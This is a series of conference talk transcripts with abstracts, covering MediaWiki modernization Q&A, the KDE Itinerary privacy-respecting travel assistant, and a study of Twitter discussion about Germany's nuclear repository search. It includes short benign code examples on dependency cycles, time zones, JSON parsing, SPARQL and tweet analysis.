A really interesting case of a legacy system; thanks for the honesty. It was really interesting as a software engineer to see how that works. I have a question about decoupling. You have a system that is enormous. How do you find the most evil parts, the ones that are most tightly coupled? Do you use some software metrics for this, or do you just know? This is quite interesting, and maybe we can talk about it a bit more in depth later. Very quickly: it's a combination. On the one hand, you just have the anecdotal experience of what is actually annoying when you work with the software and try to fix it. On the other hand, I try to find good tooling for this. The existing tooling tends to die when you just run it against our codebase. One of the things you are looking for is cyclic dependencies, and the number of possible cycles in a graph grows exponentially with the number of nodes. If you have a pretty tightly knit graph, that number quickly goes into the millions, and the tool just goes to 100% CPU and never returns. I spent quite a bit of time trying to find heuristics to get around that. We can talk about that later if you like. Next. What exactly is this Wikidata you mentioned before? Is it an extension, or is it a completely different project? There is an extension called Wikibase that implements this ontological modeling interface for MediaWiki. It is used to run a website called Wikidata, which has something like 30 million items modeled that describe the world and serve as a machine-readable data backend for other wiki projects, other Wikimedia projects. I used to work on that project for Wikimedia Germany; I moved on to do different things a couple of years ago. Lucas here in front is probably the person most knowledgeable about the latest and greatest in Wikidata development. You shortly talked about test coverage. You talked about test coverage? Yes. I would be interested in whether you have ramped up your efforts there to help you modernize, and what your current situation with test coverage is. Test coverage for MediaWiki core is below 50%, and in some parts it is below 10%, which is very worrying. One thing we started to look into about half a year ago is, instead of writing unit tests for all the code that we actually want to throw away, improving the test coverage before we touch it by using integration tests on the API level. We are currently in the process of writing a suite of tests, not just for the API modules but for all the functionality, all the application logic behind the API. That will hopefully cover most of the relevant code paths and give us confidence when we refactor the code. Other questions?
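For readers curious about the cycle problem Daniel mentions: one common heuristic is to skip enumerating the exponentially many individual cycles and instead compute strongly connected components, since every cycle lives entirely inside one SCC. This is only an illustration of that idea, not the actual tooling used at Wikimedia.

```python
def strongly_connected_components(graph):
    """Tarjan's algorithm over a {node: [dependencies]} graph.
    SCCs with more than one member are the entangled clusters worth decoupling.
    (Recursive for brevity; a huge codebase graph would need an iterative version.)"""
    index, lowlink, on_stack, stack, sccs, counter = {}, {}, set(), [], [], [0]

    def visit(v):
        index[v] = lowlink[v] = counter[0]
        counter[0] += 1
        stack.append(v)
        on_stack.add(v)
        for w in graph.get(v, ()):
            if w not in index:
                visit(w)
                lowlink[v] = min(lowlink[v], lowlink[w])
            elif w in on_stack:
                lowlink[v] = min(lowlink[v], index[w])
        if lowlink[v] == index[v]:
            component = []
            while True:
                w = stack.pop()
                on_stack.discard(w)
                component.append(w)
                if w == v:
                    break
            sccs.append(component)

    for node in graph:
        if node not in index:
            visit(node)
    return sccs

# Toy class-dependency graph; a real one would be extracted from the codebase.
deps = {"User": ["Title", "Database"], "Title": ["User"], "Database": [], "Parser": ["Title"]}
print([scc for scc in strongly_connected_components(deps) if len(scc) > 1])
```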
You will still be able to read of course without any JavaScript or anything, but the extent of functionality you will have without JavaScript on the client side is likely to be greatly reduced. We will probably end up breaking compatibility to at least some of the user created tools. Hopefully we can offer good alternatives, good APIs, good libraries that people can actually port to that are less brittle. I hope that will motivate people and maybe repay them a bit for the pain of having their tool broken if we can give them something that is more stable, more reliable and hopefully even nicer to use. There are small increments in bits and pieces all over the system. There is no great master plan, no big change to point to really. Okay, further questions? I plan to just sit outside here at the table later if you just want to come and chat. So we can also do that there. Okay, so last call. Are there any other questions? It does not appear so. I would like to ask for huge applause for Daniel for this talk. Thank you.
What does Wikimedia do to modernize Wikipedia's user experience, and why does it take so long? Editing Wikipedia feels like a blast from the past, and even just reading articles feels a bit dusty. Why is that? And how can it be fixed? And how can you help?
10.5446/53244 (DOI)
So hey, we're finally ready to start. We have Volker Krause here with a privacy by design travel assistant. It's going to be about building open source travel assistants, I think. And this talk will be in English. And if you want translations, if you want a German translation, we have a very good translation in our cabin. You can listen to the talk live on c3linguo.org. Check it out. Now, let's have a warm welcome for Volker here and have fun with his talk. Thank you. OK, so what is this about? You probably know those features in, most prominently, Google Mail, but I think TripIt was the one that pioneered this. So Gmail reads your email and then detects any kind of booking information there, like your boarding passes, your train tickets, your hotel bookings, and so on. And it can integrate that into your calendar. And it can present your unified itinerary for your entire trip and monitor that for changes. And all of that doesn't cost you anything, maybe apart from a bit of your privacy. Well, not too bad, you might think. But if we look at what kind of data is actually involved in just your travel, right, the obvious things that come to mind are your name, your birthday, your credit card number, your passport number, that kind of information, right? But that isn't even the worst part of this. Because those operators don't just get to see your specific data for one trip, right, they get to see everyone's trips. And now if you combine that information, that actually uncovers a lot of information about relations between people, your interests, who you work for, where you live, and all of that, right? So pretty much everyone here traveled to Leipzig for the last four days of the year, right? If that happens for two of us once, right, that might be coincidence. If that happens two or three years in a row, that is some kind of information. But yeah, what to do about that, right? The easy solution is to just not use those services. It's like first world luxury stuff anyway. That works until you end up in a foreign country where you don't speak any of the local languages and then get introduced to their counterpart of Schienenersatzverkehr or Tarifzonen-Randgebiet. And at that point you might be interested in actually understanding what's happening on your trip in some form that you actually understand and that you are familiar with. Ideally without installing 15 different vendor applications for wherever you actually might be traveling, right? So we need something better. And that obviously leads us to: let's do it ourselves. Then we can at least design this for privacy right from the start, build it on top of free software and open data. But of course, it's not entirely obvious that this will actually work, right? Google and Apple, they have a totally different amount of resources available for this. So can we actually build this ourselves? So let's have a look at what those services actually need to function. And it turns out it's primarily about data, not so much about code. There are some difficult parts in terms of code involved as well, like the image processing and the PDF handling to detect the barcode in your boarding pass. But all of that exists as ready-made building blocks. So we basically just need to put this nicely together. So let's look at the data. That's the more interesting part. In general, that breaks down to three different categories. The first one is what I call personal data here.
So that's basically booking information, documents or tickets, boarding passes specific to you. So at least you don't have a problem with access, because that is sent to you and you need to have access to that. But it comes in all kinds of forms and shapes. There are the challenges to actually extract that. The second kind of data is what I would call static data. So for example, the location of an airport. Now you could argue that that could change and there are rumors that some people apparently managed to build new airports. I live in Berlin so I don't believe this. Jokes aside, static refers to static within the release cycle of the software, right? So several weeks or a few months. So this is stuff that we can ship as offline databases. And offline, of course, helps us with privacy because then you're not observable from the outside. And the third category is dynamic data. So stuff that is very, very short lived such as delay information. There is no way we can do that offline, right? If we want that kind of information, we will always need some kind of online querying. And let's look through those three categories in a bit more detail. For the booking data, Google was faced with the same problem. So they used their monopoly and defined the standard in which operators should ideally have machine readable annotations on their booking information. And that's awesome because we can just use the same system. That's what nowadays became schema.org, which I think Lukas mentioned in the morning as well. At least in the US and Europe, you find that in about 30 to 50% of booking emails you get from hotels, airlines, or event brokers. So that's a good start. And then there's the rest, which is basically unstructured data, random PDF files, or HTML emails we have to work with. There are Apple Wallet boarding passes. They are somewhat semi-structured and most widespread for flight tickets. Well, that's somewhat usable. And then barcodes. So that's what you find on your boarding passes or train tickets. I could probably fill an entire talk just with the various details on the different barcode systems. For the one on boarding passes, I think Karsten Nohl had a talk at Congress a few years back where he showed how they work and what you can do with them. The hashtag #boardingpass is a very nice source of test data. The one that you find on German railway tickets is also pretty well researched already. The ones we actually had to break ourselves were the ones for Italy. To my knowledge, we are the first ones who published the content of those binary barcodes. And we are currently working on the VDV-Kernapplikation eTicket, which is the standard for German local transportation tickets. That actually has some crypto that you need to get around to actually see the content. So if you're interested in that kind of stuff, there is quite some interesting detail to be found in this. Let's continue with the static data. There, of course, we have Wikidata, which has almost everything we need. We are making heavy use of that, and that's also why I'm here today on the Wikimedia stage. One thing that Wikidata doesn't do perfectly is time zone information. That's why we are using the OpenStreetMap data for this. There are in Wikidata three different ways of specifying the time zone: UTC offsets, some kind of coarse human readable naming like Central European Summer Time, and then the actual IANA time zone specifications like Europe/Berlin.
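A quick aside on why the IANA zone IDs just mentioned are the variant the extractor needs, sketched with Python's standard zoneinfo module; the dates are arbitrary examples around a European DST switch, not data from the talk.

from datetime import datetime
from zoneinfo import ZoneInfo

berlin = ZoneInfo("Europe/Berlin")

before = datetime(2019, 10, 26, 9, 0, tzinfo=berlin)   # day before the DST switch
after = datetime(2019, 10, 27, 9, 0, tzinfo=berlin)    # day of the DST switch

print(before.utcoffset())   # 2:00:00 (CEST)
print(after.utcoffset())    # 1:00:00 (CET)

# A boarding time stored with a hard-coded "+02:00" offset would be an hour
# off after the transition -- exactly the missed-flight scenario described.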
And that's the one we actually need because they contain daylight saving time transitions. And that is actually crucial for travel assistance, because you can have a flight from, say, the US to Europe on the night where there is a daylight saving time transition on one end. And if we get that wrong, right, we are off by one hour, and that could mean you miss your flight. So that we need to get absolutely right. And Wikidata there mixes the three time zone variations. That's why we fall back to OpenStreetMap there. Another area that still needs work is vendor specific station identifiers. So there's a number of train companies that have their own numeric or alphanumeric identifiers, which you find, for example, in the barcodes of tickets. So that's our way to actually find out where people are traveling. So that's something we are trying to feed into Wikidata as we get our hands on those identifiers. For airports, that's easy because they are internationally standardized. For train stations, that's a bit more messy. And finally, the dynamic data. That's again an area where we benefit from Google using their monopoly. They wanted to have local public transportation information in Google Maps. So they defined the GTFS format, which is a way for local transport operators to send their schedules to Google. But most of the time that is done in a way that they basically publish this as open data. And that way, all of us get access to it. And then there's Navitia, which is a free software implementation of a routing and journey query service that consumes all of that open data schedule information. And that then, in turn, we can use again to find out departure schedules, delays, and that kind of live information. Apple Wallet also has some kind of live updating polling mechanism. But that is somewhat dangerous because it leaks personally identifiable information. So basically, a unique identifier for your pass is sent out with the API request to poll an update. So that is basically just a last resort mechanism if you have nothing else. And then there's a bunch of vendor-specific, more or less proprietary APIs that we could use. They are unfortunately not often compatible with free software and open source. They might require API keys that you're not allowed to share, or they have terms and conditions that are simply incompatible with what we are trying to do. For some this works, but there's still some room for improvement in those vendors understanding the value of proper open data access. OK, so that's the theory. Let's have a look at what we have actually built for this. So there's two backend components, so to say. There's the extraction library that implements the schema.org data model for flights, for trains, for hotels, for restaurants, and for events. It can do the structured data extraction. That might sound easy at first, but it turns out that for some of the operators, doing proper JSON array encoding is somewhat hard. So I mean, you need to have a comma in between two objects and brackets around it. Some of them struggle with that. So we have lots of workarounds in parsing the data we receive. Then we have an unstructured extraction system that's basically small scripts per provider or per operator that then use regular expressions or XPath queries depending on the input and turn that into our data model. We currently, I think, have slightly more than 50 of those. I know that Apple has about 600, so that is still one order of magnitude more, but it's not impossible, right?
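For the malformed schema.org JSON mentioned above (a missing comma between two objects in an array), a workaround could look roughly like the sketch below. This is an illustration in Python, not the actual extraction-library code, and the naive regex would of course also touch "}{" sequences that happen to appear inside strings.

import json
import re

def parse_lenient(raw: str):
    try:
        return json.loads(raw)
    except json.JSONDecodeError:
        # Insert the missing comma between back-to-back objects: `}{` or `} {`.
        repaired = re.sub(r"\}\s*\{", "}, {", raw)
        return json.loads(repaired)

# Hypothetical broken payload of the kind described in the talk.
broken = '[{"@type": "FlightReservation", "reservationNumber": "XXXXXX"} {"@type": "Flight"}]'
print(parse_lenient(broken))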
So I think we have the means there with free software to come to a similar result as people that have an Apple or Google scale budget for this. The service coverage is actually quite different. So for Apple, I've seen their custom extractors, so they have a lot of US car rental services. We have somewhat more important stuff like CCC tickets, so the Congress ticket is actually recognized and I managed to get in with the app. What the extraction engine also does is it augments whatever we find in the input documents with information we have from Wikidata. So we usually have time zones, countries, geo coordinates, all that useful stuff for then offering assistance features on top. Input formats are basically everything I mentioned. The usual stuff you get in an email from a transport operator or any kind of booking document. The second piece of backend components is the public transportation library. That's basically a client API for Navitia mainly, but also for some of the proprietary widespread backends like HAFAS, that's the stuff Deutsche Bahn is using. It can aggregate the results from multiple backends. If you're using open data in a backend, it propagates the attribution information correctly. And just a few days ago, it also gained support for querying train and platform layouts, so Wagenstandsansage in German, so we can have all of that in the app. And then of course there's the KDE Itinerary app itself. So it has a, it's very hard to read here, it's basically a timeline with the various booking information you have, grouped together by trip. It can insert the live weather information. Again, that's online access, so it's optional, but it's kind of useful. And this is, you probably can't read that, but that's my train to Leipzig this morning, and that's actually the Congress entry ticket. And the box at the top is the collapsible group for my trip to Leipzig for Congress. And it can show the actual tickets and barcodes, including Apple Wallet passes. So if you sometimes have a manual inspection at an airport where they don't scan your boarding pass, but look at it, apparently that looks reasonable enough that you can board an aircraft with it. At least I wasn't arrested so far. And then we have one of my favorite features, also powered by Wikidata. It's the power plug incompatibility warning. So I mean, if you're traveling to, say, the US or UK, you're probably aware that they have incompatible power plugs. But there are some countries where this isn't, at least to me, isn't that obvious, like Switzerland or Italy, where only half of my power plugs work. So this is the Italy example. It tells me that my Schuko plugs won't work, only my Euro plugs. And the right one is, I think, for the UK, where nothing is compatible. If you occasionally forget your power plug converter while traveling, that is super useful. And then, of course, we have the integration with real-time data. So we can show the delay information and platform changes. The part in the middle is the alternative connection selection for trains. So if you have a train ticket that isn't bound to a specific connection, then the app lets you pick the one you actually want to take. Or if you're missing a connection, you need to move to a different train. You can do that right in the app as well. The screenshot on the right-hand side is your overall travel statistics. So if you're interested in seeing the carbon impact of all your trips and the year-over-year changes, the app shows that to you.
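The power plug warning described above essentially boils down to a set intersection between the plug types you carry and the socket types used at the destination. Below is a hand-written illustration in Python; the plug and socket letters are simplified, and in the real app this kind of data comes from Wikidata rather than being hard-coded like this.

# Illustrative (and simplified) mapping of countries to socket types.
SOCKETS = {
    "DE": {"C", "F"},        # Europlug + Schuko
    "IT": {"C", "F", "L"},
    "CH": {"C", "J"},
    "GB": {"G"},
}

def plug_warning(home: str, destination: str) -> str:
    usable = SOCKETS[home] & SOCKETS[destination]
    if not usable:
        return "None of your plugs will fit - pack an adapter."
    if usable < SOCKETS[home]:
        missing = SOCKETS[home] - usable
        return f"Partially compatible: plug types {sorted(missing)} will not fit."
    return "Fully compatible."

print(plug_warning("DE", "CH"))   # only the Europlug works, the Schuko does not
print(plug_warning("DE", "GB"))   # nothing fits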
And I wasn't really successful, but that's largely because the old data isn't complete. So if you're interested in that, since we have all the data, that can help you see if you're actually on the right track there. And then, to get data into that, we also have a plugin for email clients. This one is for KMail. So it basically runs the extraction on the email you're currently looking at. And it shows you a summary of what's in there. In this case, my train to Leipzig this morning, including the option to add that to the calendar or send it to the app on the phone. We also have the browser extension. So this is the website of the UDKDE conference, which has the schema.org annotations on it. And the browser extension recognizes that and again offers me to add that either to my calendar or to the itinerary app. And that also works on many restaurant websites or event websites. They have those annotations on the website for the Google search. So again, we benefit a bit from Google. Okay, then we get to the more experimental stuff that basically just was finished in the last couple of days and that we haven't shown anywhere else publicly yet. The first one is, and that's a bit better to read at least, if you saw the timeline earlier, right, it had my train booking to Leipzig and then the Congress ticket. But that still leaves two gaps, right? I need to get from home to the station in Berlin and I need to get from the station in Leipzig to Congress. And what we have now is a way for the app to automatically recognize those gaps and fill them with suggestions on what kind of local transport you could take. So here the one from Leipzig to Congress is expanded and shows the tram. That still needs some work to do live tracking so that it accounts for delays and changes your alarm clock in the morning if there are delays on that trip. But we have all the building blocks to make the whole thing much more smart in this area now. And then this, I think, was literally done yesterday. So that's why the graphics still are very basic. It's the train layout, the coach layout display for your trip, so that you know where your reserved seat on the train can actually be found. Then, I only showed the KMail plug-in so far. We also have a work in progress Thunderbird integration, which is probably the much more widespread email client. Feature wise more or less the same as I showed for KMail. So it scans the email and displays your summary and offers you to put that into the app or possibly later on also into the calendar. This one is even more experimental. I can only show you a screenshot of the web inspector proving that it managed to extract something. That's the integration with Nextcloud. I hope we'll have an actual working prototype for this in January then. Those two things are of course important for you to even get to the data, the booking data, that then the app or other tools you build on top can consume. So where to get this from? There's the wiki link up there. The app is currently not yet in the Play Store or in the F-Droid main repository. We have an F-Droid nightly build repository. I hope that within the next month we'll get actual official releases in the easier to reach stores than what we have right now. If you're interested in helping with that, there's some stuff in Wikidata where improvement of the data directly benefits this work, and that is specifically around train stations.
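Since the talk points at train station data in Wikidata as an area where help is welcome, here is a sketch of how one could query for German railway stations that still lack coordinates. The item and property IDs (Q55488 railway station, Q183 Germany, P625 coordinate location) are given to the best of my knowledge and should be double-checked on wikidata.org; the User-Agent string is a placeholder, and a broad query like this may need narrowing to avoid endpoint timeouts.

import requests

QUERY = """
SELECT ?station ?stationLabel WHERE {
  ?station wdt:P31/wdt:P279* wd:Q55488 ;   # instance of (a subclass of) railway station
           wdt:P17 wd:Q183 .               # located in Germany
  FILTER NOT EXISTS { ?station wdt:P625 ?coord . }
  SERVICE wikibase:label { bd:serviceParam wikibase:language "en,de". }
}
LIMIT 50
"""

resp = requests.get(
    "https://query.wikidata.org/sparql",
    params={"query": QUERY, "format": "json"},
    headers={"User-Agent": "station-gap-checker/0.1 (example)"},
)
for row in resp.json()["results"]["bindings"]:
    print(row["stationLabel"]["value"])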
I think in Germany, last time I checked, we still had a few hundred train stations that didn't have geo coordinates or even a human readable label. So that is something to look at. Vendor specific or even the more or less standard train station identifiers are something to look at. So UIC or IBNR codes for train stations, that helps a lot. Then we kind of need test data for the extractors, or forget everything I said about privacy. If you have any kind of booking documents or emails you want to donate to support this and get the providers you're using supported in the extraction engine, talk to me, that would be extremely useful. Yeah, that's it. Thank you. Hello. Hello. Yeah. That's a very impressive project. I think, do we have questions? Then I'll hand you my microphone. Yes. Would it be possible to extract platform lift data for train stations? Sorry, platform? Platform lift data. I think Deutsche Bahn has an open data API for the live status of lifts. That would of course in theory be possible. What we are trying to do is to be generic enough so that this might not be applicable in just one country. It is very European focused because most of the team is there, but lifts are something that is easy enough to generalize in a data model. It's the location on the platform and are they working or not. That would be a nice addition. That goes into the entire direction of indoor navigation or navigation around larger train stations and airports. That's probably something where we could use a better overall display with the OpenStreetMap data and then augment that with where exactly your train is stopping and in which coach your seat is, and then have the lift data so we can basically guide you to the right place in a better way. Any more questions? Yes. Is the mobile app written in Qt as well? Yes. Most of this is C++ code because that's what we use at KDE. The mobile client as well. There is a bit of Java for platform integration with Android. I don't think anyone has ever tried to build it on iOS, but of course it works on Linux based mobile platforms as well. Thanks to Qt and C++. You mostly talked about the mobile app so far, which is understandable, but as it's a QML application, does it also run on desktop? Second question, how do all the plug-ins and the different instances of the app share the data? Yes, the app runs on desktop. I was trying to see if I can actually start it here. I'm not sure on which screen it will end up. That's where we do most of the development. Let me see if I can move it over. Thank you. Now I need to find my mouse cursor on the two screens. I think I need to end the presentation first. But yeah, short answer, of course. There we go. Let me switch to... Yep, so that's it running on desktop. It has a mobile UI there. That could of course be extended to be more useful on the desktop as well. And in terms of storage, that is currently internal to the app. There's no second process accessing the actual data storage. That would just unnecessarily complicate it for now, but if there is a use for that, yeah, we'll need to see. But there was an option in the email plug-ins, for example, to send it to the app. Can I then only send it to my local app and not to the mobile app? Send to app, that's using KDE Connect. That's an integration software that allows you to remote control your phone from the desktop. So that basically bundles up all the information and sends it to the app on the phone. Or it can import it locally. Okay, do we have other questions?
Again, now we don't have time. So then, thank you very much, Volker. Maybe you can tell people where they can find you if they have anything more they want to talk about. Yeah, I mean, there's my email address, and otherwise I'll be around all four days. Around where? Everywhere? Okay. So just catch him before you run away then. Okay, so give a round of applause again, and thank you, Volker. Thank you.
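Going back to the experimental gap detection described earlier (home to station, station to venue): conceptually it is a walk over the timeline that flags transitions where one element ends somewhere other than where the next one begins. The data model and places below are invented for illustration and do not reflect the actual implementation.

from dataclasses import dataclass
from datetime import datetime

@dataclass
class Element:
    start: datetime
    end: datetime
    from_place: str
    to_place: str

# A toy timeline: a train booking followed by an event ticket.
timeline = [
    Element(datetime(2019, 12, 26, 9, 6), datetime(2019, 12, 26, 10, 15),
            "Berlin Hbf", "Leipzig Hbf"),
    Element(datetime(2019, 12, 27, 10, 0), datetime(2019, 12, 30, 18, 0),
            "Leipzig Messe", "Leipzig Messe"),
]

def find_gaps(elements):
    for prev, nxt in zip(elements, elements[1:]):
        if prev.to_place != nxt.from_place:
            yield (prev.to_place, nxt.from_place, prev.end, nxt.start)

for origin, destination, not_before, not_after in find_gaps(timeline):
    print(f"Need local transport from {origin} to {destination} "
          f"between {not_before:%d.%m. %H:%M} and {not_after:%d.%m. %H:%M}")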
Getting your itinerary presented in a unified, well structured and always up to date fashion rather than as advertisement overloaded HTML emails or via countless vendor apps has become a standard feature of digital assistants such as the Google platform. While very useful and convenient, it comes at a heavy privacy cost. Besides sensitive information such as passport or credit card numbers, the correlation of travel data from a large pool of users exposes a lot about people's work, interests and relationships. Just not using such services is one way to escape this, or we build a privacy-respecting alternative ourselves! Standing on the shoulders of KDE, Wikidata, Navitia, OpenStreetMap and a few other FOSS communities we have been exploring what it would take to build a free and privacy-respecting travel assistant during the past two years, resulting in a number of building blocks and the "KDE Itinerary" application. In this talk we will look at what has been built, and how, and what can be done with this now. In particular we will review the different types of data digital travel assistants rely on, where we can get those from, and at what impact for your privacy. The most obvious data source are your personal booking information. Extracting data from reservation documents is possible from a number of different input formats, such as emails, PDF files or Apple Wallet passes, considering structured annotations and barcodes, but also by using vendor-specific extractors for unstructured data. All of this is done locally on your own devices, without any online access. Reservation data is then augmented from open data sources such as Wikidata and OpenStreetMap to fill in often missing but crucial information such as timezones or geo coordinates of departure and arrival locations. And finally we need realtime traffic data as well, such as provided by Navitia as Open Data for ground-based transport. Should the author fail to show up to this presentation it might be that his Deutsche Bahn ticket rendering code still needs a few bugfixes ;-)
10.5446/52960 (DOI)
Yeah, so welcome also from my side to this presentation. And as was just announced, I will now present to you some selected results from a case study we did on the Twitter communication surrounding the topic of the search for a nuclear repository in Germany. And a particular focus of ours was on the question whether the conversation participants would share research in these conversations. Yeah, I guess our motivation is most easily described by briefly introducing the two projects behind this case study, because this was a cooperation of two projects. The first of those is called Transens. That's a joint project of 16 German and Swiss institutes with the main goal of understanding interdependencies between science and society related to this topic of nuclear waste disposal. A reason for this interest is that in Germany, the legislation emphasizes that this process should be transparent, participatory, and science-based. So from Transens' perspective, this case study could be an opportunity to see whether we can find evidence for this being the case in the Twitter communication about this case. The second project involved in this case study is called MediCo. That's the one that I'm also working in. And MediCo has a background in scientometrics. There, the main question is how can we describe and quantify the relationships between the promotion that science publications receive in external science communication and the later impact, as it's typically measured in indicators such as citation counts. And from MediCo's perspective, this case study might be an opportunity to better understand the role that academic research plays in conversations on social media around a topic that also received considerable media attention around its time. These project backgrounds can roughly be translated into two main objectives for our case study. The first would be to just get an overview of the conversations around this topic of the German nuclear repository search on Twitter, especially who are the most active and vocal participants leading these conversations. Our second objective would be to see whether participants actively reference research in these conversations. And if so, how? Now, regarding previous research on social media's role in scholarly and science communication, there, of course, also is a lot. See, for example, Sugimoto et al. for a quite recent review of such studies. Although quite a lot of those studies have been focusing on academic users and scientists, for example, typically answering questions like which platforms are used by academics in the context of their work and which needs are fulfilled by specific platforms in this context of scholarly and science communication. Also, there have been studies addressing this question of who is it that interacts with scientific publications on online platforms. Although, probably also due to this prevalent focus on academic users, still comparatively little is known about the level to which the general public actively references and distributes academic research in their conversations on social media, for example, to strengthen their own arguments or their own claims. And whether this is the case is particularly interesting for altmetrics research. Because altmetrics quite often come with this hope that they might be better at capturing the societal influence of research than, for example, traditional bibliometric indicators like citation counts, which would primarily capture academic influence.
I assume that most of you will be familiar with the term altmetrics. Maybe as a very, very brief definition: altmetrics are this concept of measuring the influence of research products online by measuring the interaction with them on online platforms, like, for example, social media, but also blogs or online news portals and so on. Some more specific previous studies that are relevant for our work, because they go in a similar direction that we also intended to go, are shown here. So one thing that several past studies insinuate is that it's probably mostly academics who reference research on Twitter. You see a list of case studies here which insinuate that this might be the case. Furthermore, some previous studies suggest that second order citations might play a big role when asking yourself how research is referenced on Twitter. For example, Priem and Costello found for a sample of researchers that about half of the time that these researchers would reference research on Twitter, they would do so by linking to intermediate web pages, which would then themselves link to scientific publications, instead of linking directly to those scientific publications. OK, so much regarding previous research, on to our own approach. As a short reminder, what we intended to do is characterize these conversations around the German nuclear repository search on Twitter and investigate the role of research within these conversations. So first, of course, we had to collect tweets, and we did so using TAGS. TAGS is a Google Spreadsheet based script that, based on lists of keywords, fetches all tweets that contain at least one of those keywords; more on our list of keywords on the next slide. And we ran data collection for about 12 weeks surrounding the 28th of September of last year, because that was the date that potential sites for the final repository were announced. And after we had collected tweets, the next steps would be to describe them statistically, to code the most active participants in our data set, and to both automatically and manually search for references to research in this data. And these are the steps that the rest of the presentation will be about. In this table, you see summarized the keywords in the left column, the German keywords that we searched for to collect tweets, and on the right side, in the right column, the numbers of tweets retrieved this way. So initially, we collected for these 12 weeks of observation about 14,000 tweets; removing duplicates, that reduces to 10,884 tweets. And if we don't consider retweets, which in many cases would just be duplicates of another form of existing tweets in our data set, we would be left with 3,677 unique original tweets for our content analysis. Including retweets, 5,616 users were involved in these tracked conversations, and only considering unique tweets, 1,808 users participated in this. Now, of course, one of the first things we looked at is the distribution of tweets over users. And there we found a pattern that was to be expected, because this is quite common for this type of social media data: that very few, very active users contributed very large shares of our data set, and most users only contributed exactly one tweet. As I said, this was to be expected, but still needs to be reported, I think. On to the more interesting part of the user analysis, which was the manual coding. So our objective here, as mentioned earlier, was to identify who are the most active users in this conversation, who determine the conversation.
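A hedged sketch of the cleaning and counting steps described above, assuming a CSV export from TAGS with columns roughly named id_str, from_user and text; adjust the names to whatever your archive actually contains, and note that detecting retweets by the "RT @" prefix is only a heuristic.

import pandas as pd

tweets = pd.read_csv("tags_export.csv")   # placeholder file name

# 1. Drop exact duplicates collected across overlapping keyword searches.
tweets = tweets.drop_duplicates(subset="id_str")

# 2. Separate retweets (conventionally starting with "RT @") from originals.
is_retweet = tweets["text"].str.startswith("RT @")
originals = tweets[~is_retweet]

print("tweets after dedup:", len(tweets))
print("unique original tweets:", len(originals))
print("users incl. retweets:", tweets["from_user"].nunique())
print("users, originals only:", originals["from_user"].nunique())

# 3. Distribution of tweets over users - typically highly skewed.
per_user = originals["from_user"].value_counts()
print("share contributed by the 50 most active accounts:",
      per_user.head(50).sum() / len(originals))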
And to get an idea of this, we manually examined the Twitter profiles of the 50 most active users, which were together responsible for about a third of all original tweets in our sample. And specifically, we looked for three properties. First, whether they would belong to individuals or groups. Second, what their primary profession or role might be. And third, whether there would be evidence for the user having an academic background. An example of how this coding would proceed I will show you next. So here you see one random user account from our sample on the left, and the table of categories that we came up with during the coding on the right. You will surely ask yourselves how we arrived at these exact categories. And of course, the paper describes these in detail and also the process that led to them in detail; here, for the sake of time, just let me tell you that we used an inductive approach. So we didn't assume the existence of any categories from the beginning, but created these during coding and would then revise previous codings accordingly if new categories were added to the list. Now, in this example, we would, for example, code this account as likely belonging to an individual, as it shows the real name of a probably real existing person. I just blurred the last name here because it's not important for this, but the real account has a full name. Then we would have categorized this account as belonging to the category activism/initiative regarding its role, because at the center of this account there are some clearly formulated societal or political goals that this account probably strives towards. And in this case, we would have no evidence for an academic background. So quite frequently, if the examination of the Twitter biography wouldn't lead to clear results, we would also do complementary Google searches. That happened especially often with institutions, to be able to characterize those properly. OK, enough of this example. The results of the coding for the 50 most active users is what you see in this table, which is, of course, quite a lot of data at once, which is why I'll point you to some of the most interesting observations. So one thing that's obviously interesting to examine is which role category did provide most tweets. And this, in our case, would be the group categorized as activism/initiative, which was most active regarding its tweet volume. Another thing that's obviously of interest for us to know is which would be the category of users that would likely reach the largest audience. And when looking at the aggregated number of followers of the individual categories, we see that journalism in this regard by far leads the field. One should note here that this journalism group is, again, characterized by some very strong outliers to the top, because @tagesschau, @zeitonline, and @tagesspiegel were the top three, for example, in our sample regarding follower numbers. And those three alone would account for about 5.4 million of these followers. Yeah, and as you probably remember, we have a particular interest in examining the role of research and scientists in these conversations. And going from this user analysis, we can see that research institutes and researchers seem to play a comparatively minor role. There were 12% of accounts that were categorized as belonging to this group of science/engineering.
But both regarding the number of tweets, as well as the number of likely reached followers, this would be far behind activists and journalists. OK, so much for a look at our user analysis, on to the reference analysis. Here, our main question was: do conversation participants reference research in their tweets? And we did this basically in two steps. The first step was a naive one, where we just automatically searched the whole data set for the string DOI and for the regular expression for DOIs, just to see if this might already provide us with a significant amount of references to research articles. But it didn't. We only received one link to a journal article from the whole data set this way. So we definitely had to go into more detail. And we did that by first extracting all tweets that contained at least one outgoing link, and then taking a random sample of those tweets and categorizing all links by visiting the resources behind them manually and categorizing the type of resource that the tweet would link to. The results of this link coding for our random sample of 250 tweets are shown in this table. And again, I'll walk you through some of the most interesting observations bit by bit. So our first question, as I repeated sometimes already, I think, was whether users would link to scientific research in their tweets. Now, the automatic search previously had suggested that this happens extremely rarely. And the manual search would mainly confirm this. We found exactly one additional link to a scientific publication in this random sample. If we take a more generous definition of what constitutes a scientific publication, one could also count this one link to educational content as another reference of that kind. That was a reference to teaching material for geography teachers, by the way. So still, direct links to research seem to be extremely scarce. But what we did find going through all those other categories is a surprisingly large amount of links that could be counted as these second order citations I mentioned earlier. Links towards paraphrasing or summarizing materials that then themselves would link towards research results or clearly reference research results. The category where it was most easily seen that this could constitute second order citations would be what we call paraphrased studies/reports. So a link to a text or graphic that has the main purpose of summarizing previous academic publications. The typical example for this would be a scholarly blog. An example from our sample is this tweet that contains, you don't have to read these tweets, by the way, or try to read them, I summarize the important information. This contains a link to a scholarly blog. And once you are on the scholarly blog, it's fairly easy to see the scholarly blog is summarizing research results. Another category where this second order citation relationship was fairly easy to determine would be what we call popular science. What we mean by this are texts, videos, or graphics that have the main purpose of making some complex academic topic accessible. An example would be this tweet that contained a link to a video that would summarize the most important facts about the repository in Mausley in 90 seconds. And these two categories alone, as you can see, already accounted for 36 occurrences in our data set. But even in categories where it's less obvious that this is a second order citation, we did find interesting occurrences.
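The automatic first pass described above, searching tweet texts for the string "DOI" and for strings matching the DOI pattern, could look like the sketch below. The regular expression follows the commonly cited Crossref recommendation and catches most modern DOIs, but it is not guaranteed to be exhaustive; the example DOI is the generic placeholder from the DOI handbook, not a reference from the study.

import re

DOI_PATTERN = re.compile(r"\b10\.\d{4,9}/[-._;()/:A-Za-z0-9]+")

def find_doi_mentions(text: str):
    return {
        "mentions_doi_keyword": "doi" in text.lower(),
        "dois": DOI_PATTERN.findall(text),
    }

print(find_doi_mentions(
    "Neue Studie zur Endlagersuche: https://doi.org/10.1000/xyz123"
))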
